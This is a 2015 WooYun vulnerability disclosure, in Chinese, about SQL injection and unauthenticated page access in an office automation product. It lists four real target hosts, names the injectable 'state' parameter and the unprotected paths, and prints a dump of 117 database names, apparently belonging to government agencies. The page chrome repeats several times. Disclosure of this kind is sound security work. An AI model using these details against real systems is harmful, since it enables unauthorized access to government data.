某网络办公自动化系统的通杀注入和未授权访问

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092462

漏洞标题：某网络办公自动化系统的通杀注入和未授权访问

漏洞作者：陆由乙

提交时间：2015-01-21 15:25

修复时间：2015-04-21 15:26

公开时间：2015-04-21 15:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-21：细节已通知厂商并且等待厂商处理中
2015-01-26：厂商已经确认，细节仅向厂商公开
2015-01-29：细节向第三方安全合作伙伴开放
2015-03-22：细节向核心白帽子及相关领域专家公开
2015-04-01：细节向普通白帽子公开
2015-04-11：细节向实习白帽子公开
2015-04-21：细节向公众公开

简要描述：

你猜猜

详细说明：

案例：
http://218.87.140.106/
http://oa.jxgxedu.gov.cn/
http://59.55.33.137:8010/
http://59.55.33.137:8040/
漏洞说明：
打开后是个登录
但可以直接访问
mainpage/index.html

/mainpage/articleflashshow.aspx?flashtypeid=1&maxleng=7&state=1
注入参数state

available databases [117]:
[*] eoffice_2011_ayjyj
[*] eoffice_2011_cygtgs
[*] eoffice_2011_cyjyj
[*] eoffice_2011_dnajj
[*] eoffice_2011_dngxj
[*] eoffice_2011_dngyy
[*] eoffice_2011_dnhbj
[*] eoffice_2011_dnjyj
[*] eoffice_2011_dnsfj
[*] eoffice_2011_dntjj
[*] eoffice_2011_dnwsj
[*] eoffice_2011_dnzx
[*] eoffice_2011_dyjyj
[*] eoffice_2011_gxgyy
[*] eoffice_2011_gxwsj
[*] eoffice_2011_gzshgyy
[*] eoffice_2011_gzslyj
[*] eoffice_2011_gzsyj
[*] eoffice_2011_j123
[*] eoffice_2011_jrgs
[*] eoffice_2011_lngyy
[*] eoffice_2011_lnjyj
[*] eoffice_2011_nkjsw
[*] eoffice_2011_qngxj
[*] eoffice_2011_qnjyj2
[*] eoffice_2011_rjgyy
[*] eoffice_2011_scgyy
[*] eoffice_2011_scjyj
[*] eoffice_2011_sygyy
[*] eoffice_2011_syjyj
[*] eoffice_2011_sywsj
[*] eoffice_2011_xfhbj
[*] eoffice_2011_xyjt
[*] eoffice_2012_aygtj
[*] eoffice_2012_cyzfb
[*] eoffice_2012_dngtj
[*] eoffice_2012_dnjsw
[*] eoffice_2012_dnyjj
[*] eoffice_2012_dnytdzc
[*] eoffice_2012_gzkejt
[*] eoffice_2012_hcmzj
[*] eoffice_2012_hcnxs
[*] eoffice_2012_nksnxs
[*] eoffice_2012_qnwsj
[*] eoffice_2012_qnxwxcb
[*] eoffice_2012_scxgyzx
[*] eoffice_2012_scxrmyy
[*] eoffice_2012_xfsyjj
[*] eoffice_2012_xggyy
[*] eoffice_2012_ydsyjj
[*] eoffice_2012_yspt
[*] eoffice_2013_cynxs
[*] eoffice_2013_dnctgs
[*] eoffice_2013_dnlyj
[*] eoffice_2013_dnmzj
[*] eoffice_2013_dnslj
[*] eoffice_2013_dygyy
[*] eoffice_2013_gzswsj
[*] eoffice_2013_gzszxxz
[*] eoffice_2013_hcnlj
[*] eoffice_2013_hcwsj
[*] eoffice_2013_lnhbj
[*] eoffice_2013_ndjyj
[*] eoffice_2013_ndxgdj
[*] eoffice_2013_qnnbj
[*] eoffice_2013_rjnxs
[*] eoffice_2013_scjj
[*] eoffice_2013_sldl
[*] eoffice_2013_xfjyj
[*] eoffice_2013_xyjzgs
[*] eoffice_2014_ayfgj
[*] eoffice_2014_ayjsw
[*] eoffice_2014_ayjyj
[*] eoffice_2014_ayngb
[*] eoffice_2014_aynlj
[*] eoffice_2014_aysbszf
[*] eoffice_2014_ayzzb
[*] eoffice_2014_dacl
[*] eoffice_2014_dncyt
[*] eoffice_2014_gzczgljl
[*] eoffice_2014_gzsdwrmyy
[*] eoffice_2014_gzsgxw
[*] eoffice_2014_hcczj
[*] eoffice_2014_hcfgw
[*] eoffice_2014_hcgxj
[*] eoffice_2014_hclyj
[*] eoffice_2014_hcslga
[*] eoffice_2014_hndc
[*] eoffice_2014_lngxj
[*] eoffice_2014_qnsfj
[*] eoffice_2014_qnslj
[*] eoffice_2014_syngb
[*] eoffice_2014_synxs
[*] eoffice_2014_syzzb
[*] eoffice_2014_xfnxs
[*] eoffice_2014_xfxzf
[*] eoffice_2014_xgwsj
[*] eoffice_2014_xlwy
[*] eoffice_2014_ydlyj
[*] eoffice_2015_ayybj
[*] eoffice_2015_hcgyy
[*] eoffice_2015_hclwzfdd
[*] eoffice_2015_lngxz
[*] eoffice_2015_xfkgj
[*] eoffice_2015_xfswj
[*] eoffice_2015_xfzfw
[*] eoffice_Noa_WebUrlRewrite
[*] eoffice_Sms_Manage
[*] eoffice_standard_gzycjgxx
[*] master
[*] model
[*] msdb
[*] ocdc_xfxzf
[*] OCDC_yspt
[*] professional_gzndgyy
[*] tempdb
[*] test

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源陆由乙@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-01-26 09:12

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给江西分中心，由江西分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092462

漏洞标题：某网络办公自动化系统的通杀注入和未授权访问

相关厂商：网络办公自动化系统

漏洞作者：陆由乙

提交时间：2015-01-21 15:25

修复时间：2015-04-21 15:26

公开时间：2015-04-21 15:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源陆由乙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-092462

漏洞标题：某网络办公自动化系统的通杀注入和未授权访问

相关厂商：网络办公自动化系统

漏洞作者： 陆由乙

提交时间：2015-01-21 15:25

修复时间：2015-04-21 15:26

公开时间：2015-04-21 15:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-092462"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 陆由乙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：陆由乙

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源陆由乙@乌云